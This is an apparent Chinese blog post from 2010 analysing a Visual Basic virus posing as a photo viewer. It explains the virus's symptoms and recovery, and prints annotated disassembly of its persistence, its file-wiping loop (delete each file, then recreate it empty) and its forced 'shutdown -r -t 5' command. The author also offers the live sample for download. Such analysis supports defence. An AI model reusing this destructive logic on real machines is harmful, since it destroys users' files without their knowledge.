“妃雅照片”病毒的简单分析

上面的图片是中毒之后的效果,关键部位已经隐藏鸟。不过要是想看高清图片的话可以猛击此处下载病毒样本测试(虚拟机下运行哦,出了问题别找我。hoho 🙂 )。

上图是病区的所有文件信息,不要运行那个“电子找.exe”就好哈,另外提一下。那个Pic.dll文件其实是个图片,将扩展名改为jpeg就会发现这个dll文件就是病毒发作之后设置的桌面背景,如果测试病毒只想得到这个图片的话那么到这里就够鸟 😉 。

上图是病毒发作之后的另外一个症状,所有文件的大小变为0。不过很不幸的告诉大家,这个病毒直接将源文件删除,并没有进行隐藏。所以只能很悲剧哦的高速中毒的同志们,数据没鸟。如果运气好的话可以用易我数据回复向导(我记得本站有个下载链接的,自己搜索吧)或者其他的数据恢复软件尝试下恢复数据,但是成功的概率貌似很小,很小。如果只想知道自己的数据是怎么没的,还能不能找回来。那么看到这里就行了,如果想要更近一步的解释可以继续看 😀 。另外说一下,如果硬盘分区的盘符在光驱之后则文件不会被修改,例如光驱盘符为D,则D盘之后的文件将不会被删除(系统盘文件不受影响)。

上图是病毒运行界面,其实mm长得还是挺漂亮滴。病毒在运行过程中是不会发作滴,但是一旦点了界面上的“关”那个按钮,那就真的挫啦。如果不小心运行了,可以使用任务管理器将其结束掉。并且运行完之后再次运行将会直接出现关机对话框。反正是挺恶心滴 😎 。

虽然病毒提示关机,但是你会发现中招之后的第一次并不能关闭计算机,嘎嘎。中招之后那个电子书在运行就直接提示关机啦,不能看鸟。郁郁了吧?其实要删除病毒也挺简单的,该病毒只有一个可执行文件,中毒之后可以从当前用户的启动文件夹下找到,直接用第三方进程管理工具将其结束掉并且删除即可,但是很不幸,文件驾鹤西游鸟,回不来啦。 :8
最后到了代码时间鸟,先看第一部分,程序是怎么知道有木有中毒的呢?判断比较简单:

00463E60    55              push ebp                                 ; 运行次数判断,看是不是第一次,貌似第一次都好重要啊。
00463E61    8BEC            mov ebp,esp
00463E63    83EC 18         sub esp,0x18
00463E66    68 46144000     push 
00463EDB    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00463EE2    FF15 58104000   call dword ptr ds:[< &MSVBVM60.#598>]     ; MSVBVM60.rtcDoEvents
00463EE8    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5
00463EEF    C745 AC 0C27460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "WinDir"
00463EF6    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463EFD    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F00    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F03    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F09    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F0C    50              push eax
00463F0D    FF15 40104000   call dword ptr ds:[< &MSVBVM60.#667>]     ; MSVBVM60.rtcEnvironBstr
00463F13    8BD0            mov edx,eax
00463F15    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F18    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F1E    50              push eax
00463F1F    68 20274600     push 电子照.00462720                     ; UNICODE "\system32\taskmgr.exe"
00463F24    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00463F2A    8BD0            mov edx,eax
00463F2C    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F2F    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F35    50              push eax
00463F36    6A 01           push 0x1
00463F38    6A FF           push -0x1
00463F3A    6A 20           push 0x20
00463F3C    FF15 B8104000   call dword ptr ds:[< &MSVBVM60.__vbaFileO>; MSVBVM60.__vbaFileOpen
00463F42    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00463F45    51              push ecx
00463F46    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00463F49    52              push edx
00463F4A    6A 02           push 0x2
00463F4C    FF15 D0104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStrList
00463F52    83C4 0C         add esp,0xC
00463F55    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F58    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463F5E    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00463F65    C745 AC 5027460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "C:\Pic.dll"
00463F6C    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
00463F73    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
00463F76    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463F79    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00463F7F    6A 00           push 0x0
00463F81    8D45 B4         lea eax,dword ptr ss:[ebp-0x4C]
00463F84    50              push eax
00463F85    FF15 B0104000   call dword ptr ds:[< &MSVBVM60.#645>]     ; MSVBVM60.rtcDir
00463F8B    8BD0            mov edx,eax
00463F8D    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463F90    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00463F96    50              push eax
00463F97    68 6C274600     push 电子照.0046276C
00463F9C    FF15 6C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCm>; MSVBVM60.__vbaStrCmp
00463FA2    F7D8            neg eax
00463FA4    1BC0            sbb eax,eax
00463FA6    F7D8            neg eax
00463FA8    F7D8            neg eax
00463FAA    66:8945 84      mov word ptr ss:[ebp-0x7C],ax
00463FAE    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00463FB1    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00463FB7    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
00463FBA    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00463FC0    0FBF4D 84       movsx ecx,word ptr ss:[ebp-0x7C]
00463FC4    85C9            test ecx,ecx
00463FC6    0F84 8E010000   je 电子照.0046415A                       ; 如果找到pic.dll文件则不跳转。直接进入关机流程
00464020    BA 50274600     mov edx,电子照.00462750                  ; UNICODE "C:\Pic.dll"
00464025    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00464028    83C1 38         add ecx,0x38
0046402B    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00464031    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
00464038    6A 01           push 0x1
0046403A    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046403D    8B51 38         mov edx,dword ptr ds:[ecx+0x38]
00464040    52              push edx
00464041    8D45 CC         lea eax,dword ptr ss:[ebp-0x34]
00464044    50              push eax
00464045    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
0046404B    50              push eax
0046404C    8D4D D0         lea ecx,dword ptr ss:[ebp-0x30]
0046404F    51              push ecx
00464050    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00464056    50              push eax
00464057    6A 14           push 0x14
00464059    E8 5AE6FFFF     call 电子照.004626B8
0046405E    8945 90         mov dword ptr ss:[ebp-0x70],eax
00464061    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00464067    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
0046406A    52              push edx
0046406B    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
0046406E    83C0 38         add eax,0x38
00464071    50              push eax
00464072    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00464078    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
0046407B    8B55 90         mov edx,dword ptr ss:[ebp-0x70]
0046407E    8951 34         mov dword ptr ds:[ecx+0x34],edx
00464081    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00464084    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
0046408A    C745 FC 0A00000>mov dword ptr ss:[ebp-0x4],0xA           ; 调用关机代码
00464091    C745 AC 7427460>mov dword ptr ss:[ebp-0x54],电子照.00462>; UNICODE "shutdown -r -t 5"
00464098    C745 A4 0800000>mov dword ptr ss:[ebp-0x5C],0x8
0046409F    8D55 A4         lea edx,dword ptr ss:[ebp-0x5C]
004640A2    8D4D B4         lea ecx,dword ptr ss:[ebp-0x4C]
004640A5    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
0046415A    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0 ;如果没有文件则跳转到这里 
00464161    9B              wait
00464162    68 99414600     push 电子照.00464199
00464167    EB 26           jmp short 电子照.0046418F ;删除了部分代码,太长了

病毒在退出过程中执行的那些见不的人的勾当,hoho:

00467925    51              push ecx
00467926    68 34294600     push 电子照.00462934
0046792B    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467931    8BD0            mov edx,eax
00467933    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467936    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
0046793C    50              push eax
0046793D    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467943    8D55 C4         lea edx,dword ptr ss:[ebp-0x3C]          ; 将程序复制到用户的启动文件夹下
00467946    52              push edx
00467947    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]
0046794A    50              push eax
0046794B    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]

 00467A6F    68 50274600     push 电子照.00462750                        ; UNICODE "C:\Pic.dll"
00467A74    8B55 CC         mov edx,dword ptr ss:[ebp-0x34]
00467A77    52              push edx
00467A78    68 C0294600     push 电子照.004629C0                        ; UNICODE "\Pic.dll"
00467A7D    FF15 2C104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
00467A83    8BD0            mov edx,eax
00467A85    8D4D C8         lea ecx,dword ptr ss:[ebp-0x38]
00467A88    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
00467A8E    50              push eax
00467A8F    FF15 D4104000   call dword ptr ds:[< &MSVBVM60.#576>]     ; MSVBVM60.rtcFileCopy
00467A95    8D45 C8         lea eax,dword ptr ss:[ebp-0x38]          ; 复制pic.dll文件到系统盘根目录下
00467A98    50              push eax
00467A99    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]

00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                        ; GetFloder 获取文件夹
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarLa>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVarSe>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                        ; Files 获取文件
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]

00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]                 ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1


00464690    55              push ebp ;文件以及文件夹删除函数
00464691    8BEC            mov ebp,esp
00464693    83EC 18         sub esp,0x18
00464696    68 46144000     push 
0046469B    64:A1 00000000  mov eax,dword ptr fs:[0]
004646A1    50              push eax
004646A2    64:8925 0000000>mov dword ptr fs:[0],esp
004646A9    B8 A4040000     mov eax,0x4A4
004646AE    E8 8DCDF9FF     call 
004646B3    53              push ebx
004646B4    56              push esi
004646B5    57              push edi
004646B6    8965 E8         mov dword ptr ss:[ebp-0x18],esp
004646B9    C745 EC A011400>mov dword ptr ss:[ebp-0x14],电子照.004011>; /
004646C0    C745 F0 0000000>mov dword ptr ss:[ebp-0x10],0x0
004646C7    C745 F4 0000000>mov dword ptr ss:[ebp-0xC],0x0
004646CE    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
004646D1    8B08            mov ecx,dword ptr ds:[eax]
004646D3    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
004646D6    52              push edx
004646D7    FF51 04         call dword ptr ds:[ecx+0x4]
004646DA    C745 FC 0100000>mov dword ptr ss:[ebp-0x4],0x1
004646E1    8B45 10         mov eax,dword ptr ss:[ebp+0x10]
004646E4    C700 00000000   mov dword ptr ds:[eax],0x0
004646EA    C745 FC 0200000>mov dword ptr ss:[ebp-0x4],0x2
004646F1    6A 00           push 0x0
004646F3    68 30284600     push 电子照.00462830                      ; (Initial CPU selection)
004646F8    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
004646FE    51              push ecx
004646FF    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464705    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]
0046470B    52              push edx
0046470C    8D85 3CFFFFFF   lea eax,dword ptr ss:[ebp-0xC4]
00464712    50              push eax
00464713    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
00464719    C745 FC 0300000>mov dword ptr ss:[ebp-0x4],0x3
00464720    8B4D 0C         mov ecx,dword ptr ss:[ebp+0xC]
00464723    898D B4FEFFFF   mov dword ptr ss:[ebp-0x14C],ecx
00464729    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464733    B8 10000000     mov eax,0x10
00464738    E8 03CDF9FF     call 
0046473D    8BD4            mov edx,esp
0046473F    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464745    8902            mov dword ptr ds:[edx],eax
00464747    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046474D    894A 04         mov dword ptr ds:[edx+0x4],ecx
00464750    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464756    8942 08         mov dword ptr ds:[edx+0x8],eax
00464759    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046475F    894A 0C         mov dword ptr ds:[edx+0xC],ecx
00464762    6A 01           push 0x1
00464764    68 C8274600     push 电子照.004627C8                      ; GetFloder 获取文件夹
00464769    8D95 3CFFFFFF   lea edx,dword ptr ss:[ebp-0xC4]
0046476F    52              push edx
00464770    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
00464776    50              push eax
00464777    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
0046477D    83C4 20         add esp,0x20
00464780    50              push eax
00464781    8D4D 8C         lea ecx,dword ptr ss:[ebp-0x74]
00464784    51              push ecx
00464785    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
0046478B    C745 FC 0400000>mov dword ptr ss:[ebp-0x4],0x4
00464792    6A 00           push 0x0
00464794    68 DC274600     push 电子照.004627DC                      ; Files 获取文件
00464799    8D55 8C         lea edx,dword ptr ss:[ebp-0x74]
0046479C    52              push edx
0046479D    8D85 CCFEFFFF   lea eax,dword ptr ss:[ebp-0x134]
004647A3    50              push eax
004647A4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004647AA    83C4 10         add esp,0x10
004647AD    8BD0            mov edx,eax
004647AF    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647B5    FF15 60104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarZero
004647BB    8D8D 20FEFFFF   lea ecx,dword ptr ss:[ebp-0x1E0]
004647C1    51              push ecx
004647C2    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
004647C5    52              push edx
004647C6    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
004647CC    50              push eax
004647CD    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
004647D3    51              push ecx
004647D4    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
004647DA    52              push edx
004647DB    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
004647E1    50              push eax
004647E2    FF15 04114000   call dword ptr ds:[< &MSVBVM60.__vbaFor>; MSVBVM60.__vbaForEachVar
004647E8    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
004647EE    E9 47010000     jmp 电子照.0046493A
004647F3    C745 FC 0500000>mov dword ptr ss:[ebp-0x4],0x5         ; 循环删除文件
004647FA    6A FF           push -0x1
004647FC    FF15 48104000   call dword ptr ds:[< &MSVBVM60.__vbaOnE>; MSVBVM60.__vbaOnError
00464802    C745 FC 0600000>mov dword ptr ss:[ebp-0x4],0x6
00464809    8D4D 9C         lea ecx,dword ptr ss:[ebp-0x64]
0046480C    51              push ecx
0046480D    FF15 08114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrVarCopy
00464813    8BD0            mov edx,eax
00464815    8D4D BC         lea ecx,dword ptr ss:[ebp-0x44]
00464818    FF15 00114000   call dword ptr ds:[< &MSVBVM60.__vbaStr>; MSVBVM60.__vbaStrMove
0046481E    C745 FC 0700000>mov dword ptr ss:[ebp-0x4],0x7
00464825    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464828    52              push edx
00464829    FF15 70104000   call dword ptr ds:[< &MSVBVM60.#529>]   ; MSVBVM60.rtcKillFiles
0046482F    C745 FC 0800000>mov dword ptr ss:[ebp-0x4],0x8         ; 通过rtcKillFiles直接删除文件,太狠鸟~
00464836    8D45 BC         lea eax,dword ptr ss:[ebp-0x44]
00464839    8985 B4FEFFFF   mov dword ptr ss:[ebp-0x14C],eax
0046483F    C785 ACFEFFFF 0>mov dword ptr ss:[ebp-0x154],0x4008
00464849    C785 A4FEFFFF F>mov dword ptr ss:[ebp-0x15C],-0x1
00464853    C785 9CFEFFFF 0>mov dword ptr ss:[ebp-0x164],0xB
0046485D    6A 00           push 0x0
0046485F    68 6C284600     push 电子照.0046286C                      ; Scripting.FileSystemObject
00464864    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
0046486A    51              push ecx
0046486B    FF15 A0104000   call dword ptr ds:[< &MSVBVM60.#716>]   ; MSVBVM60.rtcCreateObject2
00464871    B8 10000000     mov eax,0x10
00464876    E8 C5CBF9FF     call 
0046487B    8BD4            mov edx,esp
0046487D    8B85 ACFEFFFF   mov eax,dword ptr ss:[ebp-0x154]
00464883    8902            mov dword ptr ds:[edx],eax
00464885    8B8D B0FEFFFF   mov ecx,dword ptr ss:[ebp-0x150]
0046488B    894A 04         mov dword ptr ds:[edx+0x4],ecx
0046488E    8B85 B4FEFFFF   mov eax,dword ptr ss:[ebp-0x14C]
00464894    8942 08         mov dword ptr ds:[edx+0x8],eax
00464897    8B8D B8FEFFFF   mov ecx,dword ptr ss:[ebp-0x148]
0046489D    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648A0    B8 10000000     mov eax,0x10
004648A5    E8 96CBF9FF     call 
004648AA    8BD4            mov edx,esp
004648AC    8B85 9CFEFFFF   mov eax,dword ptr ss:[ebp-0x164]
004648B2    8902            mov dword ptr ds:[edx],eax
004648B4    8B8D A0FEFFFF   mov ecx,dword ptr ss:[ebp-0x160]
004648BA    894A 04         mov dword ptr ds:[edx+0x4],ecx
004648BD    8B85 A4FEFFFF   mov eax,dword ptr ss:[ebp-0x15C]
004648C3    8942 08         mov dword ptr ds:[edx+0x8],eax
004648C6    8B8D A8FEFFFF   mov ecx,dword ptr ss:[ebp-0x158]
004648CC    894A 0C         mov dword ptr ds:[edx+0xC],ecx
004648CF    6A 02           push 0x2
004648D1    68 A4284600     push 电子照.004628A4                      ; CreateTextFile
004648D6    8D95 CCFEFFFF   lea edx,dword ptr ss:[ebp-0x134]          ;将删除的文件重新创建回来
004648DC    52              push edx
004648DD    8D85 BCFEFFFF   lea eax,dword ptr ss:[ebp-0x144]
004648E3    50              push eax
004648E4    FF15 F4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarLateMemCallLd
004648EA    83C4 30         add esp,0x30
004648ED    50              push eax
004648EE    8D8D 0CFFFFFF   lea ecx,dword ptr ss:[ebp-0xF4]
004648F4    51              push ecx
004648F5    FF15 E4104000   call dword ptr ds:[< &MSVBVM60.__vbaVar>; MSVBVM60.__vbaVarSetVar
004648FB    8D8D CCFEFFFF   lea ecx,dword ptr ss:[ebp-0x134]
00464901    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFre>; MSVBVM60.__vbaFreeVar
00464907    C745 FC 0900000>mov dword ptr ss:[ebp-0x4],0x9
0046490E    8D55 9C         lea edx,dword ptr ss:[ebp-0x64]
00464911    52              push edx
00464912    8D85 88FEFFFF   lea eax,dword ptr ss:[ebp-0x178]
00464918    50              push eax
00464919    8D8D 60FCFFFF   lea ecx,dword ptr ss:[ebp-0x3A0]
0046491F    51              push ecx
00464920    8D95 5CFCFFFF   lea edx,dword ptr ss:[ebp-0x3A4]
00464926    52              push edx
00464927    8D85 BCFCFFFF   lea eax,dword ptr ss:[ebp-0x344]
0046492D    50              push eax
0046492E    FF15 20104000   call dword ptr ds:[< &MSVBVM60.__vbaNex>; MSVBVM60.__vbaNextEachVar
00464934    8985 94FBFFFF   mov dword ptr ss:[ebp-0x46C],eax
0046493A    83BD 94FBFFFF 0>cmp dword ptr ss:[ebp-0x46C],0x0
00464941  ^ 0F85 ACFEFFFF   jnz 电子照.004647F3                       ; 循环删除文件


00467C90    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467C93    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467C99    C745 FC 0C00000>mov dword ptr ss:[ebp-0x4],0xC
00467CA0    BA 50274600     mov edx,电子照.00462750                     ; UNICODE "C:\Pic.dll"
00467CA5    8B4D 08         mov ecx,dword ptr ss:[ebp+0x8]
00467CA8    83C1 38         add ecx,0x38
00467CAB    FF15 CC104000   call dword ptr ds:[< &MSVBVM60.__vbaStrCo>; MSVBVM60.__vbaStrCopy
00467CB1    C745 FC 0D00000>mov dword ptr ss:[ebp-0x4],0xD
00467CB8    6A 01           push 0x1
00467CBA    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CBD    8B48 38         mov ecx,dword ptr ds:[eax+0x38]
00467CC0    51              push ecx
00467CC1    8D55 CC         lea edx,dword ptr ss:[ebp-0x34]
00467CC4    52              push edx
00467CC5    FF15 F0104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToAnsi
00467CCB    50              push eax
00467CCC    8D45 D0         lea eax,dword ptr ss:[ebp-0x30]
00467CCF    50              push eax
00467CD0    FF15 E8104000   call dword ptr ds:[< &MSVBVM60.__vbaI4Var>; MSVBVM60.__vbaI4Var
00467CD6    50              push eax
00467CD7    6A 14           push 0x14
00467CD9    E8 DAA9FFFF     call 电子照.004626B8                        ; 设置桌面背景图片
00467CDE    8985 6CFFFFFF   mov dword ptr ss:[ebp-0x94],eax
00467CE4    FF15 30104000   call dword ptr ds:[< &MSVBVM60.__vbaSetSy>; MSVBVM60.__vbaSetSystemError
00467CEA    8B4D CC         mov ecx,dword ptr ss:[ebp-0x34]
00467CED    51              push ecx
00467CEE    8B55 08         mov edx,dword ptr ss:[ebp+0x8]
00467CF1    83C2 38         add edx,0x38
00467CF4    52              push edx
00467CF5    FF15 90104000   call dword ptr ds:[< &MSVBVM60.__vbaStrTo>; MSVBVM60.__vbaStrToUnicode
00467CFB    8B45 08         mov eax,dword ptr ss:[ebp+0x8]
00467CFE    8B8D 6CFFFFFF   mov ecx,dword ptr ss:[ebp-0x94]
00467D04    8948 34         mov dword ptr ds:[eax+0x34],ecx
00467D07    8D4D CC         lea ecx,dword ptr ss:[ebp-0x34]
00467D0A    FF15 20114000   call dword ptr ds:[< &MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
00467D10    C745 FC 0E00000>mov dword ptr ss:[ebp-0x4],0xE
00467D17    C745 88 7427460>mov dword ptr ss:[ebp-0x78],电子照.00462774 ; UNICODE "shutdown -r -t 5"
00467D1E    C745 80 0800000>mov dword ptr ss:[ebp-0x80],0x8          ; 关闭计算机代码
00467D25    8D55 80         lea edx,dword ptr ss:[ebp-0x80]
00467D28    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D2B    FF15 EC104000   call dword ptr ds:[< &MSVBVM60.__vbaVarDu>; MSVBVM60.__vbaVarDup
00467D31    6A 02           push 0x2
00467D33    8D55 B0         lea edx,dword ptr ss:[ebp-0x50]
00467D36    52              push edx
00467D37    FF15 80104000   call dword ptr ds:[< &MSVBVM60.#600>]     ; MSVBVM60.rtcShell
00467D3D    DD9D 64FFFFFF   fstp qword ptr ss:[ebp-0x9C]             ; 关闭计算机
00467D43    8D4D B0         lea ecx,dword ptr ss:[ebp-0x50]
00467D46    FF15 10104000   call dword ptr ds:[< &MSVBVM60.__vbaFreeV>; MSVBVM60.__vbaFreeVar
00467D4C    C745 FC 0F00000>mov dword ptr ss:[ebp-0x4],0xF
00467D53    833D 48934600 0>cmp dword ptr ds:[0x469348],0x0
00467D5A    75 1C           jnz short 电子照.00467D78

PS:说句废话,喜欢看黄色图片和小电影滴银要小心啦,不要得不偿失哦。

原创文章,转载请注明: 转载自 obaby@mars

本文标题: 《“妃雅照片”病毒的简单分析》

本文链接地址: https://h4ck.org.cn/2010/11/photo-virus-anylist/

分享文章:

猜你喜欢:

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注